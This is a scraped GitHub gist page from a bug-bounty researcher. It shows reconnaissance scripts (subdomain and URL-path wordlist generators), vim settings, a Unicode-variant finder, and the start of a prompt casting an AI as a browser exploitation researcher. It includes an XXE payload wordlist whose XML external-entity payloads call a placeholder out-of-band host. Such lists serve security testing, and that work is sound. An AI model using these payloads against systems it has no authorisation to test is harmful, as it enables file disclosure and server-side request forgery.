| Security Issue | Trigger |
|---|
Devansh Batham devanshbatham
✨
devanshbatham
/ com.py
Created
June 4, 2020 06:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| scope = sys.argv[1] | |
| wordlist = open('/home/levi/Desktop/Warzone/Base/tools/wordlists/commonspeak.txt').read().split('\n') | |
| for word in wordlist: | |
| if not word.strip(): | |
| continue | |
| print('{}.{}'.format(word.strip(), scope)) |
devanshbatham
/ wordlist-gen.sh
Created
August 12, 2020 16:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gau $1 | unfurl -u paths | tee $1.txt; | |
| sed 's#/#\n#g' $1.txt | sort -u | tee temp.txt; | |
| cat temp.txt | grep -Ev '\.' | tee paths-$1.txt; | |
| cat temp.txt | grep -v '(png|jpg|css|gif|woff|pdf)' | tee relevant-files.txt; | |
| cat relevant-files.txt | grep '\.' | tee files-$1.txt; | |
| rm temp.txt; | |
| rm relevant-files.txt; | |
| rm $1.txt; |
devanshbatham
/ xxe-payloads.txt
Created
September 14, 2020 11:14
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
devanshbatham
/ sslextract.py
Created
November 9, 2020 10:57
sslExtract : Extract DNS records from IP addresses
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from multiprocessing.pool import ThreadPool | |
| from time import time as timer | |
| from urllib.request import urlopen | |
| import sys | |
| import re | |
| import os.path | |
| start = timer() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :set number | |
| :set autoindent | |
| :set tabstop=4 | |
| :set ts=4 | |
| :set shiftwidth=4 | |
| :set smarttab | |
| :set softtabstop=4 | |
| :set mouse=a | |
| :set encoding=UTF-8 | |
| :set autoindent |
devanshbatham
/ GitHub-Actions-Attack-Vectors.md
Last active
March 15, 2025 21:41
GitHub Actions Attack Vectors
devanshbatham
/ unicode-fun.js
Created
February 27, 2025 18:26
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function findUnicodeVariants(input) { | |
| const results = []; | |
| const inputLower = input.toLowerCase(); | |
| const inputUpper = input.toUpperCase(); | |
| const startSubstrLower = inputLower.slice(0, 2); // First 2 chars for substring check | |
| const startSubstrUpper = inputUpper.slice(0, 2); | |
| // Function to test a full-string variant | |
| function testFullVariant(original, variant, pos, unicodeChar, codePoint) { | |
| const upper = variant.toUpperCase(); |
devanshbatham
/ browser-security.md
Created
November 29, 2025 13:51
You are a top-tier browser security researcher, in the spirit of people like:
- Samuel Groß (saelo), Natalie Silvanovich, Mark Brand, Jann Horn, Mateusz Jurczyk, Ben Hawkes, Maddie Stone (Google Project Zero / Chrome & V8 / sandbox / in-the-wild work),
- Bruno Keith (@bkth_), Niklas Baumstark (@_niklasb) (Dataflow Security; Pwn2Own Chrome/Edge/WebKit chains),
- Qixun Zhao (S0rryMyBad), Mem2019, Halbecaf, _tsuro (CTF & real-world V8/WebKit/Chakra/SpiderMonkey exploitation),
- Man Yue Mo, Manfred Paul, Hossein Lotfi (Chrome/V8 RCEs, ZDI, Pwn2Own),
- Linus Henze, BlueFrostSecurity folks (WebKit/Safari & JS engine research),
- Jack (jhalon), madstacks, rycbar77 (long-form V8 / browser exploitation education and public exploit write-ups),